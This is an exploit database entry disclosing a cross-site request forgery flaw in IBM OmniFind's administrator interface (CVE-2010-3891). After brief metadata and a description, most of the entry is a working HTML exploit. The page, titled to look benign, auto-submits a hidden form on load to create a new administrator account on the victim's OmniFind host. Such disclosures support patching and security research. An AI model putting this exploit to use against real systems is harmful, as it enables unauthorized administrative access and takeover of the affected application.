IBM OmniFind - Cross-Site Request Forgery

Author: Fatih Kilic
type: webapps
platform: multiple
port: 
date_added: 2010-11-09  
date_updated: 2010-11-09  
verified: 0  
codes: CVE-2010-3891;OSVDB-69083  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15473.html  

The forms in the administrator interface are not protected against XSRF. The
attacker can do any action in the context of the victim.

An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load.


Exploit to add an admin user:
<html>
  <head><title>Some seemingly benign web-site</title></head>
  <body onLoad="document.forms[0].submit();">

    <form method="post"
  action="http://omnifind-host/ESAdmin/security.do">
      <input type="hidden" name="command" value="saveNewUser"/>
      <input type="hidden" name="user.name" value="joemueller"/>
      <input type="hidden" name="user.role" value="0"/>
      <input type="hidden" name="user.allCollections" value="true"/>
      <input type="hidden" name="apply" value="OK"/>
    </form>
  </body>
</html>